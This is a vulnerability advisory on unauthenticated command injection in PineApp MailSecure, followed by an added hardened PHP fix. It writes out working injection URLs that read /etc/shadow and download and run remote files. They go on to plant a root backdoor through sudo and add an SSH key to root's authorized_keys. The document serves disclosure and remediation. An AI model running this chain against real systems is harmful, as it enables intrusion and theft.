PineApp MailSecure Command Execution

Published: 19 Nov 2013 | Reported by: Ruben Garrote Garcia | Type: packetstorm | Source: packetstormsecurity.com

A vulnerability exists in PineApp MailSecure where an unprivileged user can execute arbitrary commands, upload and download files, escalate privileges, and execute commands as root by sending specific https requests without authentication. This includes the potential for a backdoor and unauthorized access through an SSH key.

Code

Hi, related to this:  
http://seclists.org/fulldisclosure/2013/Nov/136  
  
In February 2013 I sent PineApp the following information:  
-----------------------------------------------------------------  
It is possible to execute any bash command as the unprivileged user qmailq by sending  
only the following https request, without authentication.  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow  
  
Uploading any file (script, binary, etc.) is possible with the wget  
command.  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile  
  
Downloading and executing it is possible with this request:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile  
  
Details of the bug:  
Lines 115-120 of /srv/www/htdocs/admin/confnetworking.html  
----------------snip-----------------  
<?  
// $nstype, $hostip and $nsserver come straight from the request and are  
// interpolated into the shell string with no validation or escaping.  
$query=explode("\n",shell_exec("/usr/bin/host -t '$nstype' '$hostip' $nsserver"));  
foreach ($query as $line)  
    if ($line)  
        echo preg_replace("/\t/","&nbsp;&nbsp;&nbsp;",$line)."<br>\n";  
?>  
----------------snip-----------------  
  
It is also possible to escalate privileges to root through a weak sudoers  
configuration on the /tmp/rc.firewall file. If you overwrite this file with  
this content:  
---------  
#!/bin/bash  
$1  
---------  
you will get a privileged backdoor.  
It is possible with the following request:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%23!/bin/bash' > /tmp/fileheader  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'$1' > /tmp/filecode  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv/tmp/rc.firewall /tmp/rc.firewall_  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/fileheader /tmp/filecode > /tmp/rc.firewall  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx /tmp/rc.firewall  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/fileheader  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/filecode  
  
And execute commands as root with:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx /tmp/rc.firewall 'whoami'  
  
With this, you can send a private ssh key and get access via the ssh service. To  
perform this you can make the following requests:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%73%73%68%2d%72%73%61%20%41%41%41%41%42%33%4e%7a%61%43%31%79%63%32%45%41%41%41%41%42%49%77%41%41%41%51%45%41%79%54%6f%4c%32%75%6b%51%36%4c%76%44%6a%78%51%65%4e%55%72%54%59%35%2b%51%66%57%37%47%51%52%4c%51%68%44%4f%69%77%7a%46%48%42%4a%66%33%59%66%49%44%50%6f%74%45%48%41%4d%43%7a%75%45%48%56%72%34%49%2f%41%77%52%73%78%76%4a%44%2b%4e%55%2b%2b%53%65%72%34%76%7a%35%4d%68%53%6c%50%37%64%47%53%78%47%58%39%31%37%7a%4b%53%53%4b%33%79%55%78%33%42%75%46%44%38%49%52%53%46%51%47%35%64%33%75%50%72%46%63%2f%4d%2b%33%61%37%30%4f%7a%45%44%2f%59%71%79%75%53%63%35%64%79%4c%64%67%59%32%61%47%77%6f%48%77%6a%4e%6f%5a%6b%79%65%44%77%72%67%63%2b%50%65%57%66%78%57%37%63%44%39%72%2f%4f%56%6d%38%59%49%61%70%7a%75%34%37%77%65%71%53%70%38%70%37%2b%43%58%4f%45%41%4c%64%2b%50%4e%54%79%4b%30%43%34%7a%51%58%37%72%35%6d%37%79%48%45%34%50%74%31%6f%75%41%43%45%6c%46%56%38%4a%4f%4f%45%38%4c%49%76%38%55%4a%67%57%30%43%64%41%55%4f%48%6a%49%75%2b%5a%6f%6d%35%54%71%50%73%72%6e%70%64%44%4e%59%6e%2b%76%33%6d%33%57%76%4f%50%71%36%66%69%38%61%72%79%53%33%61%4e%6e%7a%53%74%51%4e%5a%61%33%35%50%64%75%42%4a%49%39%33%4e%41%79%4f%48%54%59%54%31%75%56%6a%6c%79%55%51%3d%3d%20%72%75%62%65%6e%40%72%75%62%65%6e%2d%6c%61%70%74%6f%70'  
> /tmp/key.pub  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'cp /root/.ssh/authorized_keys /tmp'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/authorized_keys /tmp/key.pub > /tmp/keys.pub  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'mv /tmp/keys.pub /root/.ssh/authorized_keys'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'chown root:root /root/.ssh/authorized_keys'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'killall sshd'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'sshd'  
  
This key has the password: '1234'  
  
Now you can get access with ssh as root and bring up a tun interface with the  
appliance using the ssh client:  
ssh [email protected] -p 7022 -w0:0 -i /home/ruben/key  
  
With this the attacker has a VPN on the same network segment as the vulnerable  
MailSecure appliance.  
-----------------------------------------------------------------  
  
I made a live demo of this vulnerability, but did not reveal the  
manufacturer, so the bugs were not fixed.  
http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html  
  
A video demo will be released soon on my blog.  
  
Version affected:  
MailSecure <= 5099SK  
  
Credits:  
-----------  
Ruben Garrote García  
rubengarrote [at] gmail [dot] com  
http://boken00.blogspot.com  
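As an added example, not PineApp's code and not part of the advisory, here is a hardened rewrite of the six lines the advisory quotes from confnetworking.html: the record type is checked against an allowlist, the host and name-server values are restricted to hostname characters, every argument goes through escapeshellarg(), and resolver output is HTML-escaped before it is echoed. It assumes the same three GET parameters (nstype, hostip, nsserver) and does not add the authentication the advisory reports as missing on the admin page.

```php
<?php
// Added example, not PineApp's code: a hardened version of the snippet the
// advisory quotes from confnetworking.html. The original interpolates the
// nstype, hostip and nsserver request parameters into one shell string, so
// a ';' in nsserver runs a second command as the web server user.

// Record types this page has any reason to look up.
const ALLOWED_NSTYPES = ['a', 'aaaa', 'cname', 'mx', 'ns', 'ptr', 'soa', 'txt', 'any'];

// Hostname or IP literal only: letters, digits, dots, hyphens and colons.
// Spaces, ';', '|', '&', quotes and everything else are rejected outright.
function isHostToken(string $value): bool
{
    return $value !== '' && strlen($value) <= 253
        && preg_match('/^[A-Za-z0-9.:-]+$/', $value) === 1;
}

// Returns the command line to run, or null if any parameter is invalid.
// escapeshellarg() is defence in depth: even an allowed value cannot break
// out of its single-quoted argument.
function buildHostCommand(string $nstype, string $hostip, string $nsserver): ?string
{
    $nstype = strtolower($nstype);
    if (!in_array($nstype, ALLOWED_NSTYPES, true) || !isHostToken($hostip)) {
        return null;
    }
    $cmd = '/usr/bin/host -t ' . escapeshellarg($nstype) . ' ' . escapeshellarg($hostip);
    if ($nsserver !== '') {                 // the name server is optional
        if (!isHostToken($nsserver)) {
            return null;
        }
        $cmd .= ' ' . escapeshellarg($nsserver);
    }
    return $cmd;
}

// Request handling: reject and log bad input instead of trying to repair it.
// (Authenticating the caller of this admin page is a separate, prior step.)
$cmd = buildHostCommand($_GET['nstype'] ?? '', $_GET['hostip'] ?? '', $_GET['nsserver'] ?? '');
if ($cmd === null) {
    error_log('confnetworking: rejected lookup parameters from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(400);
    exit('Invalid lookup parameters');
}
foreach (explode("\n", (string) shell_exec($cmd)) as $line) {
    if ($line !== '') {
        // Escape resolver output before echoing it into the page.
        echo str_replace("\t", '&nbsp;&nbsp;&nbsp;', htmlspecialchars($line)) . "<br>\n";
    }
}
```

With this version the request from the advisory, whose nsserver value is `www.google.es;%20cat%20/etc/shadow`, fails the isHostToken() check on the `;` and the space and is answered with HTTP 400 and a log line instead of reaching the shell.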
